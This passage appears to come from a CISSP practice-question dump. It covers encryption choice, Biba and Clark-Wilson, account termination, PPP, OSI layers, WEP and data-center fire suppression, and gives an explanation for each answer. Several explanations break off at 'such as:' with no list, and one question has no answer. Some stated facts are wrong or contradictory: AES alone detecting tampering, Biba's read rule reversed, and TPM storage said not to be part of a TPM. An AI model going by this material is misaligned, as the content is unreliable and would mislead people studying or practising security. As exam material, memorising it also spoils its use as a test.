for their roles and responsibilities before, during, and after the emergency. Conducting business continuity and disaster recovery training for those who have a direct role in the recovery can help to ensure that they are competent and confident to perform their tasks and duties in the event of a disruption, but it does not address the needs and expectations of other audiences who may also be affected by or involved in the business continuity and disaster recovery processes. Publishing a corporate business continuity and disaster recovery plan on the corporate website can help to make the plan accessible and transparent to the stakeholders, but it does not guarantee that the plan is understood, followed, or updated by the employees.
Which of the following is MOST appropriate for protecting confidentially of data stored on a hard drive?
Triple Data Encryption Standard (3DES)
Advanced Encryption Standard (AES)
Message Digest 5 (MD5)
Secure Hash Algorithm 2(SHA-2)
The most appropriate method for protecting the confidentiality of data stored on a hard drive is to use the Advanced Encryption Standard (AES). AES is a symmetric encryption algorithm that uses the same key to encrypt and decrypt data. AES can provide strong and efficient encryption for data at rest, as it uses a block cipher that operates on fixed-size blocks of data, and it supports various key sizes, such as 128, 192, or 256 bits. AES can protect the confidentiality of data stored on a hard drive by transforming the data into an unreadable form that can only be accessed by authorized parties who possess the correct key. AES can also provide some degree of integrity and authentication, as it can detect any modification or tampering of the encrypted data. Triple Data Encryption Standard (3DES), Message Digest 5 (MD5), and Secure Hash Algorithm 2 (SHA-2) are not the most appropriate methods for protecting the confidentiality of data stored on a hard drive, although they may be related or useful cryptographic techniques. 3DES is a symmetric encryption algorithm that uses three iterations of the Data Encryption Standard (DES) algorithm with two or three different keys to encrypt and decrypt data. 3DES can provide encryption for data at rest, but it is not as strong or efficient as AES, as it uses a smaller key size (56 bits per iteration), and it is slower and more complex than AES. MD5 is a hash function that produces a fixed-length output (128 bits) from a variable-length input. MD5 does not provide encryption for data at rest, as it does not use any key to transform the data, and it cannot be reversed to recover the original data. MD5 can provide some integrity for data at rest, as it can verify if the data has been changed or corrupted, but it is not secure or reliable, as it is vulnerable to collisions and pre-image attacks. SHA-2 is a hash function that produces a fixed-length output (224, 256, 384, or 512 bits) from a variable-length input. SHA-2 does not provide encryption for data at rest, as it does not use any key to transform the data, and it cannot be reversed to recover the original data. SHA-2 can provide integrity for data at rest, as it can verify if the data has been changed or corrupted, and it is more secure and reliable than MD5, as it is resistant to collisions and pre-image attacks.
Which of the following would an attacker BEST be able to accomplish through the use of Remote Access Tools (RAT)?
Reduce the probability of identification
Detect further compromise of the target
Destabilize the operation of the host
Maintain and expand control
Remote Access Tools (RAT) are malicious software that allow an attacker to remotely access and control a compromised host, often without the user’s knowledge or consent. RATs can be used to perform various malicious activities, such as stealing data, installing backdoors, executing commands, spying on the user, or spreading to other hosts. One of the main objectives of RATs is to maintain and expand control over the target network, by evading detection, hiding their presence, and creating persistence mechanisms.
Which one of the following data integrity models assumes a lattice of integrity levels?
Take-Grant
Biba
Harrison-Ruzzo
Bell-LaPadula
The Biba model is a data integrity model that assumes a lattice of integrity levels, where each subject and object has a fixed integrity level. The model enforces two rules: the simple integrity property and the *-integrity property. The simple integrity property states that a subject can only read an object with an equal or lower integrity level. The *-integrity property states that a subject can only write to an object with an equal or higher integrity level. These rules prevent data corruption from low-integrity sources and unauthorized modification from high-integrity sources. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition, page 316; CISSP For Dummies, 7th Edition, page 113.
Who is accountable for the information within an Information System (IS)?
Security manager
System owner
Data owner
Data processor
The data owner is the person who has the authority and responsibility for the information within an Information System (IS). The data owner is accountable for the security, quality, and integrity of the data, as well as for defining the classification, sensitivity, retention, and disposal of the data. The data owner must also approve or deny the access requests and periodically review the access rights. The security manager, the system owner, and the data processor are not accountable for the information within an IS, but they may have roles and responsibilities related to the security and operation of the IS. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Which of the following is the MOST effective practice in managing user accounts when an employee is terminated?
Implement processes for automated removal of access for terminated employees.
Delete employee network and system IDs upon termination.
Manually remove terminated employee user-access to all systems and applications.
Disable terminated employee network ID to remove all access.
The most effective practice in managing user accounts when an employee is terminated is to implement processes for automated removal of access for terminated employees. This practice can ensure that the access rights of the terminated employee are revoked as soon as possible, preventing any unauthorized or malicious use of the account. Automated removal of access can be achieved by using software tools or scripts that can disable or delete the account, remove it from any groups or roles, and revoke any permissions or privileges associated with the account. Automated removal of access can also reduce the human errors or delays that may occur in manual processes, and provide an audit trail of the actions taken. Deleting employee network and system IDs upon termination, manually removing terminated employee user-access to all systems and applications, and disabling terminated employee network ID to remove all access are all possible ways to manage user accounts when an employee is terminated, but they are not as effective as automated removal of access. Deleting employee network and system IDs upon termination may cause problems with data retention, backup, or recovery, and may not remove all traces of the account from the systems. Manually removing terminated employee user-access to all systems and applications may be time-consuming, error-prone, or incomplete, and may depend on the cooperation and coordination of different administrators or departments. Disabling terminated employee network ID to remove all access may not be sufficient, as the account may still exist and be reactivated, or may have access to some resources that are not controlled by the network ID.
Which security modes is MOST commonly used in a commercial environment because it protects the integrity
of financial and accounting data?
Biba
Graham-Denning
Clark-Wilson
Beil-LaPadula
The security mode that is most commonly used in a commercial environment because it protects the integrity of financial and accounting data is Clark-Wilson. A security mode is a formal model or framework that defines the rules and principles for implementing and enforcing security policies and controls on a system or a network. A security mode can be based on various criteria or objectives, such as confidentiality, integrity, availability, or accountability. Clark-Wilson is a security mode that focuses on the integrity of data and transactions, and is designed to prevent unauthorized or improper modifications or tampering of data. Clark-Wilson is based on the concept of separation of duties, which requires that different roles or functions are assigned to different parties, and that no single party can perform all the steps of a transaction or a process. Clark-Wilson also involves the concept of well-formed transactions, which requires that all the transactions or operations on data are consistent, complete, and verifiable, and that they preserve the state and the validity of the data. Clark-Wilson can provide some benefits for security, such as enhancing the accuracy and reliability of the data and the transactions, preventing fraud or errors, and supporting the audit and compliance activities. Clark-Wilson is most commonly used in a commercial environment because it protects the integrity of financial and accounting data, which are critical and sensitive for the business operations and performance of the organization. Clark-Wilson can help to ensure that the financial and accounting data are accurate, consistent, and valid, and that they reflect the true and fair view of the financial position and results of the organization. Clark-Wilson can also help to prevent or detect any unauthorized or improper modifications or tampering of the financial and accounting data, such as embezzlement, falsification, or manipulation, which may cause financial losses or legal liabilities for the organization. Biba, Graham-Denning, and Beil-LaPadula are not the security modes that are most commonly used in a commercial environment because they protect the integrity of financial and accounting data, although they may be related or useful security modes. Biba is a security mode that focuses on the integrity of data and transactions, and is designed to prevent unauthorized or improper modifications or tampering of data. Biba is based on the concept of no read down and no write up, which requires that a subject can only read data of lower or equal integrity level, and can only write data of higher or equal integrity level. Biba can provide some benefits for security, such as enhancing the accuracy and reliability of the data and the transactions, preventing corruption or contamination, and supporting the audit and compliance activities. However, Biba is not the security mode that is most commonly used in a commercial environment
What is the MAIN purpose of a change management policy?
To assure management that changes to the Information Technology (IT) infrastructure are necessary
To identify the changes that may be made to the Information Technology (IT) infrastructure
To verify that changes to the Information Technology (IT) infrastructure are approved
To determine the necessary for implementing modifications to the Information Technology (IT) infrastructure
The main purpose of a change management policy is to ensure that all changes made to the IT infrastructure are approved, documented, and communicated effectively across the organization. This helps to minimize the risks associated with unauthorized or poorly planned changes, such as security breaches, system failures, or compliance issues. A change management policy does not assure management that changes are necessary, identify the changes that may be made, or determine the necessity for implementing modifications, although these may be part of the change management process. References: CISSP CBK Reference
Which of the following is part of a Trusted Platform Module (TPM)?
A non-volatile tamper-resistant storage for storing both data and signing keys in a secure fashion
A protected Pre-Basic Input/Output System (BIOS) which specifies a method or a metric for “measuring”
the state of a computing platform
A secure processor targeted at managing digital keys and accelerating digital signing
A platform-independent software interface for accessing computer functions
A Trusted Platform Module (TPM) is a secure processor targeted at managing digital keys and accelerating digital signing. A TPM is a cryptoprocessor chip that is embedded on a motherboard or a device, and that provides a secure and trustworthy environment for the execution and the storage of cryptographic operations and keys. A TPM can provide some benefits for security, such as enhancing the confidentiality and integrity of the data and the code, preventing unauthorized modifications or tampering, and enabling remote attestation or verification. A TPM can perform various functions, such as:
A non-volatile tamper-resistant storage for storing both data and signing keys in a secure fashion, a protected Pre-Basic Input/Output System (BIOS) which specifies a method or a metric for “measuring” the state of a computing platform, and a platform-independent software interface for accessing computer functions are not part of a TPM, although they may be related or useful concepts or techniques. A non-volatile tamper-resistant storage for storing both data and signing keys in a secure fashion is a feature or a component of a TPM, but it is not the whole TPM. A non-volatile tamper-resistant storage is a type of memory or device that can retain the data and the keys even when the power is off, and that can resist physical or logical attacks or modifications. A non-volatile tamper-resistant storage can provide some benefits for security, such as enhancing the availability and the integrity of the data and the keys, preventing data loss or corruption, and facilitating the recovery and the restoration process. A protected Pre-Basic Input/Output System (BIOS) which specifies a method or a metric for “measuring” the state of a computing platform is a function or a result of a TPM, but it is not the whole TPM. A protected Pre-Basic Input/Output System (BIOS) is a firmware or a software that is responsible for initializing and testing the hardware and software components of a system or a device, and for loading and executing the operating system. A protected Pre-Basic Input/Output System (BIOS) can provide some benefits for security, such as enhancing the performance and the functionality of the system or the device, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. A platform-independent software interface for accessing computer functions is a concept or a technique that is related to a TPM, but it is not the whole TPM. A platform-independent software interface is a software component or a layer that allows a user or an application to access and use the functions or the features of a computer system or a device, regardless of the type or the nature of the system or the device, such as the hardware, the software, or the operating system. A platform-independent software interface can provide some benefits for security, such as enhancing the usability and the interoperability of the system or the device, supporting the encryption and the authentication mechanisms, and enabling the segmentation and isolation of the system or the device.
What does electronic vaulting accomplish?
It protects critical files.
It ensures the fault tolerance of Redundant Array of Independent Disks (RAID) systems
It stripes all database records
It automates the Disaster Recovery Process (DRP)
Section: Security Operations
Which of the following MUST be in place to recognize a system attack?
Stateful firewall
Distributed antivirus
Log analysis
Passive honeypot
Log analysis is the most essential method to recognize a system attack. Log analysis is the process of collecting, reviewing, and interpreting the records of events and activities that occur on a system or a network. Logs can provide valuable information and evidence about the source, nature, and impact of an attack, as well as the actions and responses of the system or the network. Log analysis can help to detect and analyze anomalies, patterns, trends, and indicators of compromise, as well as to identify and correlate the root cause, scope, and severity of an attack. Log analysis can also help to support incident response, forensic investigation, audit, and compliance activities. Log analysis requires the use of appropriate tools, techniques, and procedures, as well as the implementation of effective log management practices, such as log generation, collection, storage, retention, protection, and disposal. Stateful firewall, distributed antivirus, and passive honeypot are not the methods that must be in place to recognize a system attack, although they may be related or useful techniques. Stateful firewall is a type of network security device that monitors and controls the incoming and outgoing network traffic based on the state, context, and rules of the network connections. Stateful firewall can help to prevent or mitigate some types of attacks, such as denial-of-service, spoofing, or port scanning, by filtering or blocking the packets that do not match the established or expected state of the connection. However, stateful firewall is not sufficient to recognize a system attack, as it may not be able to detect or analyze the attacks that bypass or exploit the firewall rules, such as application-layer attacks, encryption-based attacks, or insider attacks. Distributed antivirus is a type of malware protection solution that uses a centralized server and multiple agents or clients to scan, detect, and remove malware from the systems or the network. Distributed antivirus can help to prevent or mitigate some types of attacks, such as viruses, worms, or ransomware, by updating and applying the malware signatures, heuristics, or behavioral analysis to the systems or the network. However, distributed antivirus is not sufficient to recognize a system attack, as it may not be able to detect or analyze the attacks that evade or disable the antivirus solution, such as zero-day attacks, polymorphic malware, or rootkits. Passive honeypot is a type of decoy system or network that mimics the real system or network and attracts the attackers to interact with it, while monitoring and recording their activities. Passive honeypot can help to divert or distract some types of attacks, such as reconnaissance, scanning, or probing, by providing false or misleading information to the attackers, while collecting valuable intelligence about their techniques, tools, or motives. However, passive honeypot is not sufficient to recognize a system attack, as it may not be able to detect or analyze the attacks that target the real system or network, or that avoid or identify the honeypot.
What is the PRIMARY goal of fault tolerance?
Elimination of single point of failure
Isolation using a sandbox
Single point of repair
Containment to prevent propagation
The primary goal of fault tolerance is to eliminate single point of failure, which is any component or resource that is essential for the operation or the functionality of a system or a network, and that can cause the entire system or network to fail or malfunction if it fails or malfunctions itself. Fault tolerance is the ability of a system or a network to suffer a fault but continue to operate, by adding redundant or backup components or resources that can take over or replace the failed or malfunctioning component or resource, without affecting the performance or the quality of the system or network. Fault tolerance can provide some benefits for security, such as enhancing the availability and the reliability of the system or network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. Fault tolerance can be implemented using various methods or techniques, such as:
Isolation using a sandbox, single point of repair, and containment to prevent propagation are not the primary goals of fault tolerance, although they may be related or possible outcomes or benefits of fault tolerance. Isolation using a sandbox is a security concept or technique that involves executing or testing a program or a code in a separate or a restricted environment, such as a virtual machine or a container, to protect the system or the network from any potential harm or damage that the program or the code may cause, such as malware, viruses, worms, or trojans. Isolation using a sandbox can provide some benefits for security, such as enhancing the confidentiality and the integrity of the system or the network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. However, isolation using a sandbox is not the primary goal of fault tolerance, as it is not a method or a technique of adding redundant or backup components or resources to the system or the network, and it does not address the availability or the reliability of the system or the network. Single point of repair is a security concept or technique that involves identifying or locating the component or the resource that is responsible for the failure or the malfunction of the system or the network, and that can restore or recover the system or the network if it is repaired or replaced, such as a disk, a server, or a router. Single point of repair can provide some benefits for security, such as enhancing the availability and the reliability of the system or the network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. However, single point of repair is not the primary goal of fault tolerance, as it is not a method or a technique of adding redundant or backup components or resources to the system or the network, and it does not prevent or eliminate the failure or the malfunction of the system or the network. Containment to prevent propagation is a security concept or technique that involves isolating or restricting the component or the resource that is affected or infected by a fault or an attack, such as a malware, a virus, a worm, or a trojan, to prevent or mitigate the spread or the transmission of the fault or the attack to other components or resources of the system or the network, such as by disconnecting, disabling, or quarantining the component or the resource. Containment to prevent propagation can provide some benefits for security, such as enhancing the confidentiality and the integrity of the system or the network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. However, containment to prevent propagation is not the primary goal of fault tolerance, as it is not a method or a technique of adding redundant or backup components or resources to the system or the network, and it does not ensure or improve the performance or the quality of the system or the network.
Which of the following methods of suppressing a fire is environmentally friendly and the MOST appropriate for a data center?
Inert gas fire suppression system
Halon gas fire suppression system
Dry-pipe sprinklers
Wet-pipe sprinklers
The most environmentally friendly and appropriate method of suppressing a fire in a data center is to use an inert gas fire suppression system. An inert gas fire suppression system is a type of gaseous fire suppression system that uses an inert gas, such as nitrogen, argon, or carbon dioxide, to extinguish a fire. An inert gas fire suppression system works by displacing the oxygen in the area and reducing the oxygen concentration below the level that supports combustion. An inert gas fire suppression system is environmentally friendly, as it does not produce any harmful or toxic by-products, and it does not deplete the ozone layer. An inert gas fire suppression system is also appropriate for a data center, as it does not damage or affect the electronic equipment, and it does not pose any health risks to the personnel, as long as the oxygen level is maintained above the minimum requirement for human survival. Halon gas fire suppression system, dry-pipe sprinklers, and wet-pipe sprinklers are not the most environmentally friendly and appropriate methods of suppressing a fire in a data center, although they may be effective or common fire suppression techniques. Halon gas fire suppression system is a type of gaseous fire suppression system that uses halon, a chemical compound that contains bromine, to extinguish a fire. Halon gas fire suppression system works by interrupting the chemical reaction of the fire and inhibiting the combustion process. Halon gas fire suppression system is not environmentally friendly, as it produces harmful or toxic by-products, and it depletes the ozone layer. Halon gas fire suppression system is also not appropriate for a data center, as it poses health risks to the personnel, and it is banned or restricted in many countries. Dry-pipe sprinklers are a type of water-based fire suppression system that uses pressurized air or nitrogen to fill the pipes, and water to spray from the sprinkler heads when a fire is detected. Dry-pipe sprinklers are not environmentally friendly, as they use water, which is a scarce and valuable resource, and they may cause water pollution or contamination. Dry-pipe sprinklers are also not appropriate for a data center, as they may damage or affect the electronic equipment, and they may trigger false alarms or accidental discharges. Wet-pipe sprinklers are a type of water-based fire suppression system that uses pressurized water to fill the pipes and spray from the sprinkler heads when a fire is detected. Wet-pipe sprinklers are not environmentally friendly, as they use water, which is a scarce and valuable resource, and they may cause water pollution or contamination. Wet-pipe sprinklers are also not appropriate for a data center, as they may damage or affect the electronic equipment, and they may trigger false alarms or accidental discharges.
What is the MOST significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers?
Non-repudiation
Efficiency
Confidentially
Privacy
The most significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers is non-repudiation. Non-repudiation is a security property that ensures that the parties involved in a communication or transaction cannot deny their participation or the validity of the data. Non-repudiation can provide some benefits for web security, such as enhancing the accountability and trustworthiness of the parties, preventing fraud or disputes, and enabling legal or forensic evidence. Certificate based encryption is a technique that uses digital certificates to encrypt and decrypt data. Digital certificates are issued by a trusted certificate authority (CA), and contain the public key and other information of the owner. Certificate based encryption can provide non-repudiation by using the public key and the private key of the parties to perform encryption and decryption, and by using digital signatures to verify the identity and the integrity of the data. Certificate based encryption can also provide confidentiality, integrity, and authentication for the communication. Session keys are temporary keys that are used to encrypt and decrypt data for a single session or communication. Session keys are usually randomly generated and exchanged between the parties using a key exchange protocol, such as Diffie-Hellman or RSA. Session keys can provide confidentiality and integrity for the communication, but they cannot provide non-repudiation, as the parties can deny their possession or usage of the session keys, or claim that the session keys were compromised or tampered with. Efficiency, confidentiality, and privacy are not the most significant benefits of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, although they may be related or useful properties. Efficiency is a performance property that measures how well a system or a process uses the available resources, such as time, space, or energy. Efficiency can be affected by various factors, such as the design, the implementation, the optimization, or the maintenance of the system or the process. Efficiency may or may not be improved by an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, depending on the trade-offs between the security and the performance of the encryption techniques. Confidentiality is a security property that ensures that the data is only accessible or disclosed to the authorized parties. Confidentiality can be provided by both session keys and certificate based encryption, as they both use encryption to protect the data from unauthorized access or disclosure. However, confidentiality is not the most significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, as it is not a new or enhanced property that is introduced by the upgrade. Privacy is a security property that ensures that the personal or sensitive information of the parties is protected from unauthorized collection, processing, or sharing. Privacy can be affected by various factors, such as the policies, the regulations, the technologies, or the behaviors of the parties involved in the communication or transaction. Privacy may or may not be improved by an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, depending on the type and the amount of information that is encrypted and transmitted. However, privacy is not the most significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, as it is not a direct or specific property that is provided by the encryption techniques.
Which of the following access management procedures would minimize the possibility of an organization's employees retaining access to secure werk areas after they change roles?
User access modification
user access recertification
User access termination
User access provisioning
The access management procedure that would minimize the possibility of an organization’s employees retaining access to secure work areas after they change roles is user access modification. User access modification is a process that involves changing or updating the access rights or permissions of a user account based on the user’s current role, responsibilities, or needs. User access modification can help to minimize the possibility of an organization’s employees retaining access to secure work areas after they change roles, as it can ensure that the employees only have the access that is necessary and appropriate for their new roles, and that any access that is no longer needed or authorized is revoked or removed. User access recertification, user access termination, and user access provisioning are not access management procedures that can minimize the possibility of an organization’s employees retaining access to secure work areas after they change roles, but they can help to verify, revoke, or grant the access of the user accounts, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2: Asset Security, page 154; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 2: Asset Security, page 146.
Which of the following is used by the Point-to-Point Protocol (PPP) to determine packet formats?
Layer 2 Tunneling Protocol (L2TP)
Link Control Protocol (LCP)
Challenge Handshake Authentication Protocol (CHAP)
Packet Transfer Protocol (PTP)
Link Control Protocol (LCP) is used by the Point-to-Point Protocol (PPP) to determine packet formats. PPP is a data link layer protocol that provides a standard method for transporting network layer packets over point-to-point links, such as serial lines, modems, or dial-up connections. PPP supports various network layer protocols, such as IP, IPX, or AppleTalk, and it can encapsulate them in a common frame format. PPP also provides features such as authentication, compression, error detection, and multilink aggregation. LCP is a subprotocol of PPP that is responsible for establishing, configuring, maintaining, and terminating the point-to-point connection. LCP negotiates and agrees on various options and parameters for the PPP link, such as the maximum transmission unit (MTU), the authentication method, the compression method, the error detection method, and the packet format. LCP uses a series of messages, such as configure-request, configure-ack, configure-nak, configure-reject, terminate-request, terminate-ack, code-reject, protocol-reject, echo-request, echo-reply, and discard-request, to communicate and exchange information between the PPP peers.
The other options are not used by PPP to determine packet formats, but rather for other purposes. Layer 2 Tunneling Protocol (L2TP) is a tunneling protocol that allows the creation of virtual private networks (VPNs) over public networks, such as the Internet. L2TP encapsulates PPP frames in IP datagrams and sends them across the tunnel between two L2TP endpoints. L2TP does not determine the packet format of PPP, but rather uses it as a payload. Challenge Handshake Authentication Protocol (CHAP) is an authentication protocol that is used by PPP to verify the identity of the remote peer before allowing access to the network. CHAP uses a challenge-response mechanism that involves a random number (nonce) and a hash function to prevent replay attacks. CHAP does not determine the packet format of PPP, but rather uses it as a transport. Packet Transfer Protocol (PTP) is not a valid option, as there is no such protocol with this name. There is a Point-to-Point Protocol over Ethernet (PPPoE), which is a protocol that encapsulates PPP frames in Ethernet frames and allows the use of PPP over Ethernet networks. PPPoE does not determine the packet format of PPP, but rather uses it as a payload.
In a Transmission Control Protocol/Internet Protocol (TCP/IP) stack, which layer is responsible for negotiating and establishing a connection with another node?
Transport layer
Application layer
Network layer
Session layer
The transport layer of the Transmission Control Protocol/Internet Protocol (TCP/IP) stack is responsible for negotiating and establishing a connection with another node. The TCP/IP stack is a simplified version of the OSI model, and it consists of four layers: application, transport, internet, and link. The transport layer is the third layer of the TCP/IP stack, and it is responsible for providing reliable and efficient end-to-end data transfer between two nodes on a network. The transport layer uses protocols, such as Transmission Control Protocol (TCP) or User Datagram Protocol (UDP), to segment, sequence, acknowledge, and reassemble the data packets, and to handle error detection and correction, flow control, and congestion control. The transport layer also provides connection-oriented or connectionless services, depending on the protocol used.
TCP is a connection-oriented protocol, which means that it establishes a logical connection between two nodes before exchanging data, and it maintains the connection until the data transfer is complete. TCP uses a three-way handshake to negotiate and establish a connection with another node. The three-way handshake works as follows:
UDP is a connectionless protocol, which means that it does not establish or maintain a connection between two nodes, but rather sends data packets independently and without any guarantee of delivery, order, or integrity. UDP does not use a handshake or any other mechanism to negotiate and establish a connection with another node, but rather relies on the application layer to handle any connection-related issues.
What is the purpose of an Internet Protocol (IP) spoofing attack?
To send excessive amounts of data to a process, making it unpredictable
To intercept network traffic without authorization
To disguise the destination address from a target’s IP filtering devices
To convince a system that it is communicating with a known entity
The purpose of an Internet Protocol (IP) spoofing attack is to convince a system that it is communicating with a known entity. IP spoofing is a technique that involves creating and sending IP packets with a forged source IP address, which is usually the IP address of a trusted or authorized host. IP spoofing can be used for various malicious purposes, such as:
The purpose of IP spoofing is to convince a system that it is communicating with a known entity, because it allows the attacker to evade detection, avoid responsibility, and exploit trust relationships.
The other options are not the main purposes of IP spoofing, but rather the possible consequences or methods of IP spoofing. To send excessive amounts of data to a process, making it unpredictable is a possible consequence of IP spoofing, as it can cause a DoS or DDoS attack. To intercept network traffic without authorization is a possible method of IP spoofing, as it can be used to hijack or intercept a TCP session. To disguise the destination address from a target’s IP filtering devices is not a valid option, as IP spoofing involves forging the source address, not the destination address.
An input validation and exception handling vulnerability has been discovered on a critical web-based system. Which of the following is MOST suited to quickly implement a control?
Add a new rule to the application layer firewall
Block access to the service
Install an Intrusion Detection System (IDS)
Patch the application source code
Adding a new rule to the application layer firewall is the most suited to quickly implement a control for an input validation and exception handling vulnerability on a critical web-based system. An input validation and exception handling vulnerability is a type of vulnerability that occurs when a web-based system does not properly check, filter, or sanitize the input data that is received from the users or other sources, or does not properly handle the errors or exceptions that are generated by the system. An input validation and exception handling vulnerability can lead to various attacks, such as:
An application layer firewall is a device or software that operates at the application layer of the OSI model and inspects the application layer payload or the content of the data packets. An application layer firewall can provide various functions, such as:
Adding a new rule to the application layer firewall is the most suited to quickly implement a control for an input validation and exception handling vulnerability on a critical web-based system, because it can prevent or reduce the impact of the attacks by filtering or blocking the malicious or invalid input data that exploit the vulnerability. For example, a new rule can be added to the application layer firewall to:
Adding a new rule to the application layer firewall can be done quickly and easily, without requiring any changes or patches to the web-based system, which can be time-consuming and risky, especially for a critical system. Adding a new rule to the application layer firewall can also be done remotely and centrally, without requiring any physical access or installation on the web-based system, which can be inconvenient and costly, especially for a distributed system.
The other options are not the most suited to quickly implement a control for an input validation and exception handling vulnerability on a critical web-based system, but rather options that have other limitations or drawbacks. Blocking access to the service is not the most suited option, because it can cause disruption and unavailability of the service, which can affect the business operations and customer satisfaction, especially for a critical system. Blocking access to the service can also be a temporary and incomplete solution, as it does not address the root cause of the vulnerability or prevent the attacks from occurring again. Installing an Intrusion Detection System (IDS) is not the most suited option, because IDS only monitors and detects the attacks, and does not prevent or respond to them. IDS can also generate false positives or false negatives, which can affect the accuracy and reliability of the detection. IDS can also be overwhelmed or evaded by the attacks, which can affect the effectiveness and efficiency of the detection. Patching the application source code is not the most suited option, because it can take a long time and require a lot of resources and testing to identify, fix, and deploy the patch, especially for a complex and critical system. Patching the application source code can also introduce new errors or vulnerabilities, which can affect the functionality and security of the system. Patching the application source code can also be difficult or impossible, if the system is proprietary or legacy, which can affect the feasibility and compatibility of the patch.
At what level of the Open System Interconnection (OSI) model is data at rest on a Storage Area Network (SAN) located?
Link layer
Physical layer
Session layer
Application layer
Data at rest on a Storage Area Network (SAN) is located at the physical layer of the Open System Interconnection (OSI) model. The OSI model is a conceptual framework that describes how data is transmitted and processed across different layers of a network. The OSI model consists of seven layers: application, presentation, session, transport, network, data link, and physical. The physical layer is the lowest layer of the OSI model, and it is responsible for the transmission and reception of raw bits over a physical medium, such as cables, wires, or optical fibers. The physical layer defines the physical characteristics of the medium, such as voltage, frequency, modulation, connectors, etc. The physical layer also deals with the physical topology of the network, such as bus, ring, star, mesh, etc.
A Storage Area Network (SAN) is a dedicated network that provides access to consolidated and block-level data storage. A SAN consists of storage devices, such as disks, tapes, or arrays, that are connected to servers or clients via a network infrastructure, such as switches, routers, or hubs. A SAN allows multiple servers or clients to share the same storage devices, and it provides high performance, availability, scalability, and security for data storage. Data at rest on a SAN is located at the physical layer of the OSI model, because it is stored as raw bits on the physical medium of the storage devices, and it is accessed by the servers or clients through the physical medium of the network infrastructure.
Which of the following factors contributes to the weakness of Wired Equivalent Privacy (WEP) protocol?
WEP uses a small range Initialization Vector (IV)
WEP uses Message Digest 5 (MD5)
WEP uses Diffie-Hellman
WEP does not use any Initialization Vector (IV)
WEP uses a small range Initialization Vector (IV) is the factor that contributes to the weakness of Wired Equivalent Privacy (WEP) protocol. WEP is a security protocol that provides encryption and authentication for wireless networks, such as Wi-Fi. WEP uses the RC4 stream cipher to encrypt the data packets, and the CRC-32 checksum to verify the data integrity. WEP also uses a shared secret key, which is concatenated with a 24-bit Initialization Vector (IV), to generate the keystream for the RC4 encryption. WEP has several weaknesses and vulnerabilities, such as:
WEP has been deprecated and replaced by more secure protocols, such as Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2), which use stronger encryption and authentication methods, such as the Temporal Key Integrity Protocol (TKIP), the Advanced Encryption Standard (AES), or the Extensible Authentication Protocol (EAP).
The other options are not factors that contribute to the weakness of WEP, but rather factors that are irrelevant or incorrect. WEP does not use Message Digest 5 (MD5), which is a hash function that produces a 128-bit output from a variable-length input. WEP does not use Diffie-Hellman, which is a method for generating a shared secret key between two parties. WEP does use an Initialization Vector (IV), which is a 24-bit value that is concatenated with the secret key.
Which of the following operates at the Network Layer of the Open System Interconnection (OSI) model?
Packet filtering
Port services filtering
Content filtering
Application access control
Packet filtering operates at the network layer of the Open System Interconnection (OSI) model. The OSI model is a conceptual framework that describes how data is transmitted and processed across different layers of a network. The OSI model consists of seven layers: application, presentation, session, transport, network, data link, and physical. The network layer is the third layer from the bottom of the OSI model, and it is responsible for routing and forwarding data packets between different networks or subnets. The network layer uses logical addresses, such as IP addresses, to identify the source and destination of the data packets, and it uses protocols, such as IP, ICMP, or ARP, to perform the routing and forwarding functions.
Packet filtering is a technique that controls the access to a network or a host by inspecting the incoming and outgoing data packets and applying a set of rules or policies to allow or deny them. Packet filtering can be performed by devices, such as routers, firewalls, or proxies, that operate at the network layer of the OSI model. Packet filtering typically examines the network layer header of the data packets, such as the source and destination IP addresses, the protocol type, or the fragmentation flags, and compares them with the predefined rules or policies. Packet filtering can also examine the transport layer header of the data packets, such as the source and destination port numbers, the TCP flags, or the sequence numbers, and compare them with the rules or policies. Packet filtering can provide a basic level of security and performance for a network or a host, but it also has some limitations, such as the inability to inspect the payload or the content of the data packets, the vulnerability to spoofing or fragmentation attacks, or the complexity and maintenance of the rules or policies.
The other options are not techniques that operate at the network layer of the OSI model, but rather at other layers. Port services filtering is a technique that controls the access to a network or a host by inspecting the transport layer header of the data packets and applying a set of rules or policies to allow or deny them based on the port numbers or the services. Port services filtering operates at the transport layer of the OSI model, which is the fourth layer from the bottom. Content filtering is a technique that controls the access to a network or a host by inspecting the application layer payload or the content of the data packets and applying a set of rules or policies to allow or deny them based on the keywords, URLs, file types, or other criteria. Content filtering operates at the application layer of the OSI model, which is the seventh and the topmost layer. Application access control is a technique that controls the access to a network or a host by inspecting the application layer identity or the credentials of the users or the processes and applying a set of rules or policies to allow or deny them based on the roles, permissions, or other attributes. Application access control operates at the application layer of the OSI model, which is the seventh and the topmost layer.
An external attacker has compromised an organization’s network security perimeter and installed a sniffer onto an inside computer. Which of the following is the MOST effective layer of security the organization could have implemented to mitigate the attacker’s ability to gain further information?
Implement packet filtering on the network firewalls
Install Host Based Intrusion Detection Systems (HIDS)
Require strong authentication for administrators
Implement logical network segmentation at the switches
Implementing logical network segmentation at the switches is the most effective layer of security the organization could have implemented to mitigate the attacker’s ability to gain further information. Logical network segmentation is the process of dividing a network into smaller subnetworks or segments based on criteria such as function, location, or security level. Logical network segmentation can be implemented at the switches, which are devices that operate at the data link layer of the OSI model and forward data packets based on the MAC addresses. Logical network segmentation can provide several benefits, such as:
